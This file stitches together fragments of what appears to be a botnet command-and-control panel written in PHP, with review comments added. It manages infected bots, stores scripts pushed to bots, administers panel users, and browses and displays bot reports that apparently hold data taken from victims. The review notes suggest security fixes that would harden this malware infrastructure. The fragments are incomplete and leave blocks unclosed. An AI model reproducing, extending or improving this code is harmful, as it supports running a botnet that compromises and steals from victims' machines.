///////////////////////////////////////////////////////////////////////////////////////////////////
// Bulk "botsaction" handler (fragment: the two outer blocks opened here are still open where the
// fragment ends). It reads an action name and a list of bot ids from GET or POST, checks the
// action against $botMenu, builds a SQL filter over `bot_id`, and for the 'fullinfo' /
// 'fullinfoss' actions toggles the `favorite` flag of one row in `botnet_list`.
//
// NOTE(review): every query here goes through the legacy mysql_* extension, which was removed in
// PHP 7.0. Bound parameters (PDO or mysqli prepared statements) would replace all of the manual
// escaping below.
if ((!empty($_GET['botsaction']) || !empty($_POST['botsaction'])) && (!empty($_POST['bots']) && is_array($_POST['bots']) || !empty($_GET['bots']) && is_array($_GET['bots']))) {
    // NOTE(review): $bedit reflects the caller's r_edit_bots right, but nothing in the visible
    // part of the fragment consults it before the UPDATE further down - confirm where it is
    // enforced.
    $bedit = empty($userData['r_edit_bots']) ? 0 : 1;
    // GET takes precedence for the action name, POST takes precedence for the id list.
    $ba = !empty($_GET['botsaction']) ? $_GET['botsaction'] : $_POST['botsaction'];
    $blist = !empty($_POST['bots']) && is_array($_POST['bots']) ? $_POST['bots'] : $_GET['bots'];
    $blist = array_unique($blist);

    // Check whether the caller is allowed to perform the action: it must string-equal the first
    // element of some $botMenu entry. $botMenu is built outside this fragment - presumably it is
    // already filtered by the user's rights; verify, because this loop is the only gate visible.
    $deny = true;
    foreach ($botMenu as $item) {
        if ($item[0] !== 0 && strcmp($item[0], $ba) === 0) {
            $deny = false;
            break;
        }
    }
    if ($deny) {
        ThemeFatalError(LNG_ACCESS_DEFINED);
    }

    // Build the list of bots for MySQL as an OR-chain of quoted `bot_id` literals.
    // NOTE(review): addslashes() is not aware of the connection character set, while the code
    // below uses mysql_real_escape_string() for the same column; the elements of $blist are also
    // not checked to be strings. $sqlBlist is consumed outside this fragment.
    $sqlBlist = '';
    $count = 0;
    foreach ($blist as $bot) {
        $sqlBlist .= ($count++ == 0 ? '' : ' OR ') . "`bot_id`='" . addslashes($bot) . "'";
    }

    if (strcmp($ba, 'fullinfo') === 0 || strcmp($ba, 'fullinfoss') === 0) {
        // makefavorite: flip the `favorite` flag of one bot and echo the new value.
        // NOTE(review): this reads $_REQUEST['bots'][0] instead of the $blist validated above;
        // the is_array() checks do not guarantee that index 0 exists or is a string.
        // NOTE(review): the outer condition accepts `botsaction` from GET, so this state change
        // is reachable by a GET request, and no anti-CSRF token is checked in the visible lines.
        // NOTE(review): the results of both mysql_query() calls are used without a failure check.
        if (isset($_REQUEST['makefavorite'])) {
            $botIdQ = mysql_real_escape_string($_REQUEST['bots'][0]);
            mysql_query('UPDATE `botnet_list` SET `favorite`=IF(`favorite`=0, 1, 0) WHERE `bot_id`="' . $botIdQ . '";');
            echo mysql_result(mysql_query('SELECT `favorite` FROM `botnet_list` WHERE `bot_id`="' . $botIdQ . '";'), 0, 0);
            die;
        }
// Get the script data used to populate the script form (fragment: the two `else` blocks opened
// below are still open where the fragment ends).
// Three sources, in order: the values just POSTed (when validation produced $errors), an existing
// `botnet_scripts` row (view mode, or "new" as a copy of an existing id), or defaults.
if (count($errors) > 0) {
    // Re-display what the user submitted. Text fields pass through htmlEntitiesEx(), which is
    // defined elsewhere - presumably an HTML-escaping helper; confirm.
    $f_name = htmlEntitiesEx($_POST['name']);
    $f_is_enabled = $_POST['status'] > 0 ? true : false;
    $f_limit = intval($_POST['limit']);
    $f_bots = htmlEntitiesEx($_POST['bots']);
    $f_botnets = htmlEntitiesEx($_POST['botnets']);
    $f_countries = htmlEntitiesEx($_POST['countries']);
    $f_context = htmlEntitiesEx($_POST['context']);
} else {
    // NOTE(review): `!= -1` is a loose comparison on a raw request value, and $_GET['new'] is
    // read without an isset() check in this fragment.
    if ($is_view || $_GET['new'] != -1) {
        // NOTE(review): the id goes into a quoted SQL literal through addslashes(), which is not
        // aware of the connection character set; an integer cast or a bound parameter would be
        // the robust form if `id` is numeric (the schema is not visible here).
        if (!($r = mysqlQueryEx('botnet_scripts', 'SELECT name, flag_enabled, send_limit, bots_wl, bots_bl, botnets_wl, botnets_bl, countries_wl, countries_bl, script_text, extern_id FROM botnet_scripts WHERE id=\'' . addslashes($is_view ? $_GET['view'] : $_GET['new']) . '\' LIMIT 1'))) {
            ThemeMySQLError();
        }
        // `@` hides any warning from the fetch; a missing row ends in the fatal-error page.
        if (!($m = @mysql_fetch_row($r))) {
            ThemeFatalError(LNG_BOTNET_SCRIPT_E1, 0, 0, 0);
        }
        // Column order follows the SELECT list: 0 name, 1 flag_enabled, 2 send_limit,
        // 3/4 bots_wl/bots_bl, 5/6 botnets_wl/botnets_bl, 7/8 countries_wl/countries_bl,
        // 9 script_text. Column 10 (extern_id) is not read in this fragment.
        $f_name = htmlEntitiesEx($m[0]);
        $f_is_enabled = $m[1] > 0 ? true : false;
        $f_limit = intval($m[2]);
        // SQLListToExp() is defined elsewhere; it is given each whitelist/blacklist column pair.
        $f_bots = htmlEntitiesEx(SQLListToExp($m[3], $m[4]));
        $f_botnets = htmlEntitiesEx(SQLListToExp($m[5], $m[6]));
        $f_countries = htmlEntitiesEx(SQLListToExp($m[7], $m[8]));
        $f_context = htmlEntitiesEx($m[9]);
        // Creating from an existing row: mark the name as a copy.
        if (!$is_view) {
            $f_name = 'Copy of ' . $f_name;
        }
    } else {
        // Brand-new script: defaults.
        $f_name = 'script_' . CURRENT_TIME;
        $f_is_enabled = true;
        $f_limit = 0;
// Populate the control-panel user form (fragment: the two `else` blocks opened below are still
// open where the fragment ends). Values come from the rejected POST (when $errors is non-empty),
// from an existing `cp_users` row (edit mode, or "new" as a copy), or from defaults.
if (count($errors) > 0) {
    $formName = htmlEntitiesEx($_POST['name']);
    $formEnabled = $_POST['status'] > 0 ? true : false;
    $formComment = htmlEntitiesEx($_POST['comment']);
    // Set each right named by a key of $rights when the matching POST field is > 0.
    // NOTE(review): $v is bound by reference and no unset($v) is visible after the loop, so $v
    // remains an alias of the last element of $rights; a later write to $v would change it.
    foreach ($rights as $k => &$v) {
        if (isset($_POST[$k]) && $_POST[$k] > 0) {
            $v = 1;
        }
    }
} else {
    // NOTE(review): loose `!= -1` comparison on a raw request value; $_GET['new'] is read without
    // an isset() check in this fragment.
    if ($isEdit || $_GET['new'] != -1) {
        // NOTE(review): SELECT * returns every column of the user row although only name,
        // flag_enabled, comment and the keys of $rights are read below; listing the columns would
        // keep any credential columns out of $m (the schema is not visible here).
        // NOTE(review): the id is escaped with addslashes(), which is not aware of the connection
        // character set; a bound parameter would be the robust form.
        if (!($r = mysqlQueryEx('cp_users', 'SELECT * FROM cp_users WHERE id=\'' . addslashes($isEdit ? $_GET['edit'] : $_GET['new']) . '\' LIMIT 1'))) {
            ThemeMySQLError();
        }
        // `@` hides any warning from the fetch; a missing row ends in the fatal-error page.
        if (!($m = @mysql_fetch_assoc($r))) {
            ThemeFatalError(LNG_SYS_USER_E1, 0, 0, 0);
        }
        $formName = htmlEntitiesEx($m['name']);
        $formEnabled = $m['flag_enabled'] > 0 ? true : false;
        $formComment = htmlEntitiesEx($m['comment']);
        // Copy the rights stored in the row; same by-reference caveat as the loop above.
        foreach ($rights as $k => &$v) {
            if (isset($m[$k]) && $m[$k] > 0) {
                $v = 1;
            }
        }
        // Creating from an existing user: mark the name as a copy.
        if (!$isEdit) {
            $formName = 'Copy of ' . $formName;
        }
    } else {
        // Brand-new user: defaults.
        $formName = 'user_' . CURRENT_TIME;
        $formEnabled = true;
// File browser for the reports directory (fragment: it begins inside a block opened earlier and
// ends inside the "files action" block). The request supplies a relative path, `sub` and `file`;
// all of them are joined onto $config['reports_path'].
    // Append the requested sub-directory to the current relative path.
    $_FILTER['path'] .= ($_FILTER['path'] == '' ? '' : '/') . $_GET['sub'];
}
// Traversal guard on the combined relative path. pathUpLevelExists() is defined elsewhere -
// presumably it detects parent-directory segments; confirm how it treats backslashes and NUL
// bytes.
// NOTE(review): this is a string-level check. Resolving the final path with realpath() and
// verifying that it still lies under $config['reports_path'] would be the stronger control.
if (pathUpLevelExists($_FILTER['path'])) {
    die('WOW!');
}
$_CUR_PATH = $_FILTER['path'] == '' ? $config['reports_path'] : $config['reports_path'] . '/' . $_FILTER['path'];
///////////////////////////////////////////////////////////////////////////////////////////////////
// File download.
///////////////////////////////////////////////////////////////////////////////////////////////////
if (isset($_GET['file'])) {
    // Same string-level guard, applied to the requested file name.
    if (pathUpLevelExists($_GET['file'])) {
        die('SUPER WOW!');
    }
    $fl = $_CUR_PATH . '/' . $_GET['file'];
    // Only an existing regular file is served; `@` hides filesystem warnings.
    if (!@file_exists($fl) || !@is_file($fl)) {
        ThemeFatalError('File not exists.');
    }
    // NOTE(review): PHP has already URL-decoded $_GET, so urldecode() decodes the name a second
    // time before it reaches the download headers; httpDownloadHeaders() (not visible here) has
    // to reject or encode CR/LF and quote characters in that name - confirm.
    httpDownloadHeaders(urldecode(baseNameEx($_GET['file'])), @filesize($fl));
    // NOTE(review): file_get_contents() loads the whole file into memory; readfile() would
    // stream it instead.
    echo @file_get_contents($fl);
    die;
}
///////////////////////////////////////////////////////////////////////////////////////////////////
// Archive creation / file deletion.
///////////////////////////////////////////////////////////////////////////////////////////////////
if (isset($_POST['filesaction']) && is_numeric($_POST['filesaction']) && !empty($_POST['files']) && is_array($_POST['files'])) {
    // Every submitted name must pass the traversal guard before any action runs.
    foreach ($_POST['files'] as $file) {
        if (pathUpLevelExists($file)) {
            die('PUPER WOW!');
        }
    }
    // Deleting files.
// Detail view of a single report (fragment: $m and $tbl are set before the first visible line,
// and the closing brace after `die;` belongs to a block opened outside this fragment).
// Builds the "context" row - a download link for file-type reports, otherwise the stored text -
// then renders every field of row $m into a themed table and terminates the request.

// Base URL for links back to this report; both request values are URL-encoded and then passed
// through htmlEntitiesEx() (defined elsewhere - presumably HTML-escaping; confirm).
$sub_url = QUERY_STRING_HTML . '&t=' . htmlEntitiesEx(urlencode($_GET['t'])) . '&id=' . htmlEntitiesEx(urlencode($_GET['id']));

// (The original comment here is mis-encoded Cyrillic; it appears to say "Check the report type".)
$context = '';
if ($m[14] == BLT_FILE || $m[14] == BLT_UNKNOWN) {
    // File-type report: show a download link labelled with the stored file's base name and size.
    if (($file = baseNameEx($m[16])) == '') {
        $file = 'file';
    }
    $context = str_replace(array('{URL}', '{TEXT}'), array($sub_url . '&download=1', sprintf(LNG_REPORTS_VIEW_DOWNLOAD, htmlEntitiesEx($file), numberFormatAsInt($m[15]))), THEME_LIST_ANCHOR);
    $context = str_replace(array('{WIDTH}', '{TEXT}'), array('1%', THEME_STRING_SPACE), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $context), THEME_LIST_ITEM_LTEXT_U2);
} else {
    // Text report: fetch the stored context column for this id.
    // NOTE(review): $tbl is interpolated into the statement as an identifier; it is assigned
    // outside this fragment - confirm it is built from a validated value and never taken raw from
    // the request.
    // NOTE(review): the id is escaped with addslashes(), which is not aware of the connection
    // character set; a bound parameter would be the robust form.
    $r = mysqlQueryEx($tbl, "SELECT context FROM {$tbl} WHERE {$tbl}.id='" . addslashes($_GET['id']) . "' LIMIT 1");
    if (!$r) {
        ThemeMySQLError();
    }
    // NOTE(review): mysql_num_rows() is the documented call for the row count of a SELECT;
    // mysql_affected_rows() is documented for INSERT/UPDATE/DELETE.
    if (@mysql_affected_rows() != 1 || !($cc = @mysql_fetch_row($r))) {
        ThemeFatalError(LNG_REPORTS_VIEW_NOT_EXISTS);
    }
    $context = str_replace(array('{COLUMNS_COUNT}', '{WIDTH}', '{TEXT}'), array(2, '100%', htmlEntitiesEx($cc[0])), THEME_LIST_ITEM_PLAIN_U1);
}

// (The original comment here is mis-encoded Cyrillic; it appears to say "Output".)
// One label/value row per field of $m. String fields are escaped with htmlEntitiesEx() at the
// call site; the values produced by botPopupMenu(), bltToLng(), intToVersion(), osDataToString(),
// timeBiasToText() and tickCountToText() are inserted as returned.
// NOTE(review): confirm that those helpers escape their output themselves. The origin of $m is
// not visible here, but report rows presumably hold client-submitted data and should be treated
// as untrusted when rendered in the operator's browser.
$data = str_replace('{WIDTH}', '100%', THEME_LIST_BEGIN)
    . str_replace(array('{COLUMNS_COUNT}', '{TEXT}'), array(2, sprintf(LNG_REPORTS_VIEW_TITLE2, bltToLng($m[14]), numberFormatAsInt($m[15]))), THEME_LIST_TITLE)
    // Bot id, rendered through botPopupMenu() (not escaped here).
    . THEME_LIST_ROW_BEGIN
    . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_BOTID), THEME_LIST_ITEM_LTEXT_U1)
    . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', botPopupMenu($m[0], 'botmenu')), THEME_LIST_ITEM_LTEXT_U1)
    . THEME_LIST_ROW_END
    // Botnet name.
    . THEME_LIST_ROW_BEGIN
    . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_BOTNET), THEME_LIST_ITEM_LTEXT_U2)
    . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx($m[1])), THEME_LIST_ITEM_LTEXT_U2)
    . THEME_LIST_ROW_END
    // Version (helper output, not escaped here).
    . THEME_LIST_ROW_BEGIN
    . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_VERSION), THEME_LIST_ITEM_LTEXT_U1)
    . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', intToVersion($m[2])), THEME_LIST_ITEM_LTEXT_U1)
    . THEME_LIST_ROW_END
    // Operating system (helper output, not escaped here).
    . THEME_LIST_ROW_BEGIN
    . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_OS), THEME_LIST_ITEM_LTEXT_U2)
    . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', osDataToString($m[3])), THEME_LIST_ITEM_LTEXT_U2)
    . THEME_LIST_ROW_END
    // OS language.
    . THEME_LIST_ROW_BEGIN
    . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_OSLANG), THEME_LIST_ITEM_LTEXT_U1)
    . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx($m[4])), THEME_LIST_ITEM_LTEXT_U1)
    . THEME_LIST_ROW_END
    // Time: $m[5] plus the bias in $m[6], formatted with gmdate().
    . THEME_LIST_ROW_BEGIN
    . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_TIME), THEME_LIST_ITEM_LTEXT_U2)
    . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx(gmdate(LNG_FORMAT_DT, $m[5] + $m[6]))), THEME_LIST_ITEM_LTEXT_U2)
    . THEME_LIST_ROW_END
    // Time bias (helper output, not escaped here).
    . THEME_LIST_ROW_BEGIN
    . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_TIMEBIAS), THEME_LIST_ITEM_LTEXT_U1)
    . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', timeBiasToText($m[6])), THEME_LIST_ITEM_LTEXT_U1)
    . THEME_LIST_ROW_END
    // Tick count, divided by 1000 before formatting (helper output, not escaped here).
    . THEME_LIST_ROW_BEGIN
    . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_TICK), THEME_LIST_ITEM_LTEXT_U2)
    . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', tickCountToText($m[7] / 1000)), THEME_LIST_ITEM_LTEXT_U2)
    . THEME_LIST_ROW_END
    // Second timestamp ($m[8]), formatted with gmdate().
    . THEME_LIST_ROW_BEGIN
    . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_RTIME), THEME_LIST_ITEM_LTEXT_U1)
    . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx(gmdate(LNG_FORMAT_DT, $m[8]))), THEME_LIST_ITEM_LTEXT_U1)
    . THEME_LIST_ROW_END
    // Country.
    . THEME_LIST_ROW_BEGIN
    . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_COUNTRY), THEME_LIST_ITEM_LTEXT_U2)
    . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx($m[9])), THEME_LIST_ITEM_LTEXT_U2)
    . THEME_LIST_ROW_END
    // IPv4 address.
    . THEME_LIST_ROW_BEGIN
    . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_IPV4), THEME_LIST_ITEM_LTEXT_U1)
    . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx($m[10])), THEME_LIST_ITEM_LTEXT_U1)
    . THEME_LIST_ROW_END
    // Comment; '-' when empty.
    . THEME_LIST_ROW_BEGIN
    . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_COMMENT), THEME_LIST_ITEM_LTEXT_U2)
    . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($m[17]) ? '-' : htmlEntitiesEx($m[17])), THEME_LIST_ITEM_LTEXT_U2)
    . THEME_LIST_ROW_END
    // "Used" flag: yes only when the column equals 1.
    . THEME_LIST_ROW_BEGIN
    . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_USED), THEME_LIST_ITEM_LTEXT_U1)
    . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $m[18] == 1 ? LNG_YES : LNG_NO), THEME_LIST_ITEM_LTEXT_U1)
    . THEME_LIST_ROW_END
    // Process name; '-' when empty.
    . THEME_LIST_ROW_BEGIN
    . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_PROCNAME), THEME_LIST_ITEM_LTEXT_U2)
    . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($m[11]) ? '-' : htmlEntitiesEx($m[11])), THEME_LIST_ITEM_LTEXT_U2)
    . THEME_LIST_ROW_END
    // Process user; '-' when empty.
    . THEME_LIST_ROW_BEGIN
    . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_PROCUSER), THEME_LIST_ITEM_LTEXT_U1)
    . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($m[12]) ? '-' : htmlEntitiesEx($m[12])), THEME_LIST_ITEM_LTEXT_U1)
    . THEME_LIST_ROW_END
    // Source; '-' when empty.
    . THEME_LIST_ROW_BEGIN
    . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_SOURCE), THEME_LIST_ITEM_LTEXT_U2)
    . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($m[13]) ? '-' : htmlEntitiesEx($m[13])), THEME_LIST_ITEM_LTEXT_U2)
    . THEME_LIST_ROW_END
    // Context row built above (download link or escaped report text).
    . THEME_LIST_ROW_BEGIN
    . $context
    . THEME_LIST_ROW_END;
themeSmall(LNG_REPORTS_VIEW_TITLE, $data . THEME_LIST_END, 0, getBotJsMenu('botmenu'), 0);
die;
}
///////////////////////////////////////////////////////////////////////////////////////////////////
// (The original section title is mis-encoded Cyrillic; it appears to say "Determine the data for the filter".)
///////////////////////////////////////////////////////////////////////////////////////////////////
// (The original comment is mis-encoded Cyrillic; it appears to say: "When adding new parameters,
// the ones that js:datelist does not need must be removed.")
// Both date bounds are cast with intval(), so only integers reach the filter; a missing parameter
// becomes 0. The body of the ordering check below lies outside this fragment.
$filter['date1'] = isset($_GET['date1']) ? intval($_GET['date1']) : 0;
$filter['date2'] = isset($_GET['date2']) ? intval($_GET['date2']) : 0;
if ($filter['date1'] > $filter['date2']) {